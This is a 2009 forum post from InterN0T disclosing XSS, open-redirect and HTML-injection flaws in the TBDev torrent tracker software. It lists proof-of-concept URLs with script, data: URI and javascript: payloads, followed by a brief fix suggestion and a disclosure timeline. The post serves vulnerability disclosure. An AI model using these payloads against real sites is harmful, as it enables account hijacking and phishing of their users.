InterN0T - Advisories Advisories that are found by members of InterN0T.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack (11) Thread Tools Display Modes
  11 links from elsewhere to this Post. Click to view. #1  
Old 12th June 2009, 21:58
MaXe's Avatar
The Founder
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,714
Blog Entries: 31
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
[InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities
TBDev - XSS and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and
develop a software (php peer-to-peer) from the original
torrentbits/bytemonsoon source code.

Credits: InterN0T

External Links:
http://www.tbdev.net


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=><script>alert(0)</script>
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=><script >alert(0)</script><br

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD 4K&sure=1

Cross Site Script Redirection: (Anyone, the enduser will need to log in though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST]
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD 4K

HTML Injection:
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Info field: </textarea><script>alert(0)</script> << is reflected locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information.
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities)
-:: Solution ::-
Secure redirection calls with referer headers (just an example) and filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
__________________
Code:
                                ____/____\_________________
                      \|/      | OMG IT'S TEH LEET STORY!! |
    /*\         /\    -*-      |______  ________/\_________|
   // \\       /  \   /|\        /    \/    \  /  \
  /// \\\     /    \            /            \/    \
   // \\     /      \          /      \o/     \     \
    | |     /        \        /        |       \     \
 ___| |____/          \______/________/ \_______\_____\_________
          /     o      \
               #"=-
               /\
 __________________________________________________________
    On a mission, to find the lost member of Teh Unkwon..
Reply With Quote
Reply

Bookmarks

« [InterN0T] SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities | [InterN0T] transLucid 1.75 - Multiple Vulnerabilities »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html
Posted By For Type Date
US-CERT Cyber Security Bulletin SB09-180 -- Vulnerability Summary for the Week of June 22, 2009 This thread Refback 31st January 2010 00:14
CVE-2009-2141 - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 12th December 2009 23:39
CVE-2009-2138 - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 12th December 2009 23:39
CVE - CVE-2009-2141 (under review) This thread Refback 20th November 2009 04:15
55083: TBDEV.NET my.php info Parameter XSS This thread Refback 29th August 2009 21:11
55377: TBDev.NET login.php returnto Parameter Arbitrary Site Redirect This thread Refback 16th July 2009 14:36
Bugtraq: [InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities This thread Refback 30th June 2009 15:45
CVE - CVE-2009-2138 (under review) This thread Refback 29th June 2009 20:15
US-CERT Cyber Security Bulletin SB09-180 -- Vulnerability Summary for the Week of June 22, 2009 This thread Refback 29th June 2009 17:49
CVE - CVE-2009-2138 (under review) This thread Refback 26th June 2009 20:51
[InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities This thread Refback 21st June 2009 03:06

Similar Threads
Thread Thread Starter Forum Replies Last Post
[InterN0T] AMember 3.1.7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 11 27th September 2009 19:09
[InterN0T] transLucid 1.75 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 22:02
[InterN0T] SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:51
[InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:47


All times are GMT +2. The time now is 09:57.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1


Contact Us - InterN0T - Archive - Top
Powered by vBulletin® Version 1.3.37
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.